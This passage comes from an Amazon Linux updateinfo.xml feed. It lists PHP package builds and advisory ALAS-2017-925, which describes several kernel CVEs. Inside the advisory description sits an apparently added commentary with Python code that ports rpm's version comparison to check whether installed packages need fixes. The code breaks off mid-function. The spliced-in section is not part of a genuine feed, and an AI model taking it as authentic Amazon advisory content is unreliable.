version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-gd" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-tidy" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-tidy-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.32" release="1.135.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.32-1.135.amzn1.i686.rpm</filename></package><package name="php71-intl" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-intl-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-snmp" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-snmp-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-enchant" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-enchant-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-embedded" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-embedded-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package 
name="php71-gd" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gd-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-common" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-common-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-mbstring" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mbstring-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-dblib-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-soap" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-soap-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-ldap" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-ldap-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-imap" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-imap-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-dba" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dba-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-json" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-json-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-debuginfo" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-debuginfo-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-xmlrpc" version="7.1.11" release="1.28.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php71-xmlrpc-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-gmp" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gmp-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-recode" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-recode-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-opcache" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-opcache-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-pspell" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pspell-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-mcrypt" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mcrypt-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-odbc" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-odbc-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-xml" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xml-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-fpm" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-fpm-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-dbg" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dbg-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-process" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-process-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-pgsql" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pgsql-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-cli" 
version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-cli-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-devel" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-devel-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-bcmath" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-bcmath-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-tidy" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-tidy-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-mysqlnd" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mysqlnd-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-pdo" version="7.1.11" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-7.1.11-1.28.amzn1.x86_64.rpm</filename></package><package name="php71-xmlrpc" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xmlrpc-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-mysqlnd" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mysqlnd-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-gd" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gd-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-pspell" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pspell-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-fpm" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-fpm-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-process" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-process-7.1.11-1.28.amzn1.i686.rpm</filename></package><package 
name="php71-bcmath" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-bcmath-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-odbc" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-odbc-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-pgsql" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pgsql-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-dblib-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-xml" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xml-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-opcache" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-opcache-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-embedded" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-embedded-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-json" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-json-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-dbg" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dbg-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-intl" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-intl-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-pdo" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-7.1.11-1.28.amzn1.i686.rpm</filename></package><package 
name="php71-common" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-common-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-imap" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-imap-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-tidy" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-tidy-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-snmp" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-snmp-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-cli" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-cli-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-mcrypt" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mcrypt-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-ldap" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-ldap-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-recode" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-recode-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-gmp" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gmp-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-soap" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-soap-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-devel" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-devel-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-enchant" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-enchant-7.1.11-1.28.amzn1.i686.rpm</filename></package><package 
name="php71-dba" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dba-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-debuginfo" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-debuginfo-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php71-mbstring" version="7.1.11" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mbstring-7.1.11-1.28.amzn1.i686.rpm</filename></package><package name="php70-devel" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-devel-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-dba" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dba-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-pgsql" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pgsql-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-dblib-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-zip" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-zip-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-tidy" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-tidy-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-opcache" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-opcache-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-xml" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xml-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70" version="7.0.25" release="1.25.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php70-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-dbg" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-dbg-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-mcrypt" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mcrypt-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-enchant" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-enchant-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-odbc" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-odbc-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-xmlrpc" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-xmlrpc-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-common" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-common-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-gd" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gd-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-gmp" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-gmp-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-intl" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-intl-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-pspell" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pspell-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-mbstring" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mbstring-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-fpm" 
version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-fpm-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-imap" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-imap-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-mysqlnd" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-mysqlnd-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-ldap" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-ldap-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-snmp" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-snmp-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-json" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-json-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-cli" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-cli-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-soap" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-soap-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-pdo" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pdo-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-process" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-process-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-bcmath" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-bcmath-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-debuginfo" version="7.0.25" release="1.25.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php70-debuginfo-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-recode" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-recode-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-embedded" version="7.0.25" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-embedded-7.0.25-1.25.amzn1.x86_64.rpm</filename></package><package name="php70-opcache" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-opcache-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-json" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-json-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-xml" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xml-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-process" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-process-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-devel" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-devel-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-recode" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-recode-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-ldap" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-ldap-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-odbc" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-odbc-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-bcmath" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-bcmath-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-zip" version="7.0.25" 
release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-zip-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-pspell" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pspell-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-dba" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dba-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-intl" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-intl-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-gmp" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gmp-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-soap" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-soap-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-dbg" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-dbg-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-xmlrpc" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-xmlrpc-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-embedded" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-embedded-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-mbstring" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mbstring-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-pdo-dblib" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-dblib-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-mcrypt" version="7.0.25" 
release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mcrypt-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-cli" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-cli-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-pgsql" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pgsql-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-fpm" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-fpm-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-mysqlnd" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-mysqlnd-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-debuginfo" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-debuginfo-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-pdo" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pdo-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-tidy" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-tidy-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-gd" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-gd-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-enchant" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-enchant-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-snmp" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-snmp-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-common" version="7.0.25" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-common-7.0.25-1.25.amzn1.i686.rpm</filename></package><package name="php70-imap" version="7.0.25" 
release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php70-imap-7.0.25-1.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-925</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-925: medium priority package update for kernel</title><issued date="2017-11-18 02:03:00" /><updated date="2017-11-20 21:42:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15951:
The KEYS subsystem in the Linux kernel before 4.13.10 does not correctly synchronize the actions of updating versus finding a key in the &quot;negative&quot; state to avoid a race condition, which allows local users to cause a denial of service or possibly have unspecified other impact via crafted system calls.
1507539:
CVE-2017-15951 kernel: Race condition in the KEYS subsystem
CVE-2017-15299:
A vulnerability was found in the key management subsystem of the Linux kernel. An update on an uninstantiated key could cause a kernel panic, leading to denial of service (DoS).
1498016:
CVE-2017-15299 kernel: Incorrect updates of uninstantiated keys crash the kernel
CVE-2017-12193:
A flaw was found in the Linux kernel&#039;s implementation of associative arrays introduced in 3.13. This functionality was backported to the 3.10 kernels in Red Hat Enterprise Linux 7. The flaw involved a null pointer dereference in assoc_array_apply_edit() due to incorrect node-splitting in assoc_array implementation. This affects the keyring key type and thus key addition and link creation operations may cause the kernel to panic.
1501215:
CVE-2017-12193 kernel: Null pointer dereference due to incorrect node-splitting in assoc_array implementation
CVE-2017-12190:
It was found that in the Linux kernel through v4.14-rc5, bio_map_user_iov() and bio_unmap_user() in &#039;block/bio.c&#039; do unbalanced page refcounting if the IO vector has small consecutive buffers belonging to the same page. bio_add_pc_page() merges them into one, but the extra page reference is never dropped, causing a memory leak and a possible system lockup due to an out-of-memory condition.
1495089:
CVE-2017-12190 kernel: memory leak when merging buffers in SCSI IO vectors
CVE-2017-1000255:
A flaw was found in the Linux kernel&#039;s handling of signal frames on PowerPC systems. A malicious local user process could craft a signal frame allowing an attacker to corrupt memory.
1498067:
CVE-2017-1000255 kernel: Arbitrary stack overwrite causing oops via crafted signal frame
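Added example, not Amazon Linux or yum code: the check a practitioner wants from an entry like this one is whether the installed kernel is older than the fixed packages listed for it, which yum answers by reading the package elements of updateinfo.xml and comparing epoch, version and release with rpm's rpmvercmp rules. The Python below does the same. build_sample_updateinfo() constructs a small feed in code with this entry's layout and ALAS-2017-925's kernel EVR (it is built, not copied from the feed); the installed version strings used with needs_update() are hypothetical.

```python
"""Added example (not Amazon Linux or yum code): parse updateinfo.xml package
entries and decide, with rpm's version-comparison rules, whether an installed
package is older than the fix in an advisory."""
import xml.etree.ElementTree as ET


def rpmvercmp(a: str, b: str) -> int:
    """Port of rpm's rpmvercmp() ('^' handling omitted): 1 if a is newer, -1 if older, 0 if equal."""
    if a == b:
        return 0
    i, j, na, nb = 0, 0, len(a), len(b)
    while i != na or j != nb:
        while i != na and not (a[i].isalnum() or a[i] == "~"):  # skip separators
            i += 1
        while j != nb and not (b[j].isalnum() or b[j] == "~"):
            j += 1
        if (i != na and a[i] == "~") or (j != nb and b[j] == "~"):
            # '~' sorts before anything, even end of string: 1.0~rc1 is older than 1.0
            if i == na or a[i] != "~":
                return 1
            if j == nb or b[j] != "~":
                return -1
            i, j = i + 1, j + 1
            continue
        if i == na or j == nb:
            break
        isnum = a[i].isdigit()                # segment type is decided by the left side
        test = str.isdigit if isnum else str.isalpha
        si, sj = i, j
        while i != na and test(a[i]):
            i += 1
        while j != nb and test(b[j]):
            j += 1
        seg_a, seg_b = a[si:i], b[sj:j]
        if not seg_b:                         # types differ: a numeric segment beats alpha
            return 1 if isnum else -1
        if isnum:
            seg_a, seg_b = seg_a.lstrip("0"), seg_b.lstrip("0")
            if len(seg_a) != len(seg_b):      # longer number (without leading zeros) is bigger
                return 1 if len(seg_a) > len(seg_b) else -1
        if seg_a != seg_b:
            return 1 if seg_a > seg_b else -1
    if i == na and j == nb:
        return 0
    return -1 if i == na else 1               # whichever side has characters left is newer


def evr_cmp(x, y) -> int:
    """Compare (epoch, version, release) tuples: epoch numerically first, then rpmvercmp."""
    if x[0] != y[0]:
        return 1 if x[0] > y[0] else -1
    c = rpmvercmp(x[1], y[1])
    return c if c != 0 else rpmvercmp(x[2], y[2])


def parse_nevra(nevra: str):
    """'kernel-4.9.62-21.56.amzn1.x86_64' to (name, epoch, version, release, arch); 'pkg-1:ver-rel.arch' carries an epoch."""
    rest, arch = nevra.rsplit(".", 1)
    name, version, release = rest.rsplit("-", 2)
    epoch, _, version = version.rpartition(":")
    return name, int(epoch or 0), version, release, arch


def parse_updateinfo(xml_bytes: bytes) -> dict:
    """Map advisory id to its severity and (name, epoch, version, release, arch) packages."""
    advisories = {}
    for upd in ET.fromstring(xml_bytes).iter("update"):
        pkgs = [(p.get("name"), int(p.get("epoch", "0")), p.get("version"),
                 p.get("release"), p.get("arch")) for p in upd.iter("package")]
        advisories[upd.findtext("id")] = {"severity": upd.findtext("severity"), "packages": pkgs}
    return advisories


def needs_update(installed_nevra: str, advisory: dict):
    """Return the advisory package tuple that supersedes the installed package, or None."""
    name, epoch, version, release, arch = parse_nevra(installed_nevra)
    for pkg in advisory["packages"]:
        if pkg[0] == name and pkg[4] == arch and evr_cmp(pkg[1:4], (epoch, version, release)) > 0:
            return pkg
    return None


def build_sample_updateinfo() -> bytes:
    """Constructed sample in the feed's layout (update/pkglist/collection/package),
    built in code rather than copied; the EVR is the one ALAS-2017-925 ships."""
    updates = ET.Element("updates")
    upd = ET.SubElement(updates, "update", status="final", version="1.4", type="security")
    ET.SubElement(upd, "id").text = "ALAS-2017-925"
    ET.SubElement(upd, "severity").text = "medium"
    coll = ET.SubElement(ET.SubElement(upd, "pkglist"), "collection", short="amazon-linux-ami")
    for name, arch in (("kernel", "x86_64"), ("kernel", "i686"), ("kernel-doc", "noarch")):
        pkg = ET.SubElement(coll, "package", name=name, version="4.9.62",
                            release="21.56.amzn1", epoch="0", arch=arch)
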